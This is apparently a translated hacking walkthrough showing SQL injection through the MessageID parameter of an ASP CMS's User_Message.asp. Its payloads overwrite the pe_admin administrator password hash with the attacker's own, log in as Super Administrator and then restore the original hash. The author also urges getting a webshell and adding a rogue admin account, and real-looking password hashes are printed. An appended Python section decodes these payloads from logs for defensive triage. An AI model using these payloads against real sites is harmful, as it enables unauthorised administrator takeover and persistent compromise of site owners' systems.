Register an account first, enter the control panel and send a message to yourself.
http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4
This is the injection point.
The user name is admin. Strange, I can't capture it... OK, I caught it. "The record does not exist" appears because I was not logged in.
ef0020cf8c5e45b9 is the password.
Now we will start to update the administrator's password to the password of my registered user.
First use the modified dynamic database-exposure program to reveal the adminname and password fields in pe_admin...
);update pe_admin set password=(select userpassword from pe_user
where username=char(0x68)%2Bchar(0x61)%2Bchar(0x63)%2Bchar(0x6b)
%2Bchar(0x35)%2Bchar(0x32)%2Bchar(0x30)) where id=1;--
This statement updates the password of the user with ID=1 in the pe_admin table to the user's password from the pe_user table. Note that hack520 has to be converted to char() form.
The update was successful. The password of the user with ID=1 in the pe_admin table has now been updated to the password of hack520. Look again:
53dc3b60f2d40cd4 is the password I registered before. OK, now log in to the admin back end.
Your username: admin
Your identity: Super Administrator
SMS to be read: 1
Success. Then add an administrator account for yourself, and use the following statement to update the administrator's password back.
"user" is the registered username. If you can get into the back end, don't worry about the rest for now; get a webshell first and deal with it afterwards.
The time was just up; now let's continue. Change the administrator password back.
);declare @a sysname select @a=0x6500660030003000320030006300660038006300350065003400350062003900 update pe_admin set password=@a--
This value needs to be converted.
Update. The administrator password is changed back. OK, let's see whether the modification succeeded. ef0020cf8c5e45b9 is the original password?
Well, that's the end!
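For triage on the server side, the following added example (not part of the original post) checks that MessageID in a logged request is a plain integer and, when it is not, decodes the char() chains and UTF-16LE hex literals described above so an analyst can read the strings written without quotes. The sample query strings are constructed from the requests shown on this page, and all function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed samples: query strings as a web log might record the two
# requests shown on this page (same parameter names and payloads).
CHAR_QS = ("Action=Del&ManageType=Inbox&MessageID=4);update pe_admin set password="
           "(select userpassword from pe_user where username=char(0x68)%2Bchar(0x61)"
           "%2Bchar(0x63)%2Bchar(0x6b)%2Bchar(0x35)%2Bchar(0x32)%2Bchar(0x30)) where id=1;--")
HEX_QS = ("Action=Del&ManageType=Inbox&MessageID=4);declare @a sysname select @a="
          "0x650066003000300032003000630066"
          "0038006300350065003400350062003900 update pe_admin set password=@a--")

CHAR_CALL = r"char\(\s*(0x[0-9a-f]+|\d+)\s*\)"
CHAR_CHAIN = re.compile(rf"{CHAR_CALL}(?:\s*\+\s*{CHAR_CALL})*", re.I)
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2}){4,})", re.I)

def message_id(query_string):
    """Return the URL-decoded MessageID value, or None if the parameter is absent."""
    for pair in query_string.split("&"):
        name, _, value = pair.partition("=")
        if name.lower() == "messageid":
            return unquote(value)
    return None

def _char(arg):
    code = int(arg, 16) if arg.lower().startswith("0x") else int(arg)
    return chr(code) if code <= 0x10FFFF else "?"

def decode_char_chains(value):
    """Decode char(n)+char(n)+... runs, which spell a string without quotes."""
    return ["".join(_char(a) for a in re.findall(CHAR_CALL, m.group(0), re.I))
            for m in CHAR_CHAIN.finditer(value)]

def decode_hex_literals(value):
    """Decode long 0x... literals as UTF-16LE, the byte layout of sysname/nvarchar."""
    out = []
    for m in HEX_LITERAL.finditer(value):
        try:
            out.append(bytes.fromhex(m.group(1)).decode("utf-16-le"))
        except UnicodeDecodeError:
            out.append(m.group(0))  # not text: keep the literal for the analyst
    return out

def triage(query_string):
    """Flag a non-integer MessageID and list the strings hidden in it."""
    value = message_id(query_string)
    if value is None or re.fullmatch(r"[0-9]+", value):
        return {"suspicious": False, "decoded": []}
    return {"suspicious": True,
            "decoded": decode_char_chains(value) + decode_hex_literals(value)}
```

The same integer-only rule is what the page handling MessageID should enforce before the value reaches any SQL statement.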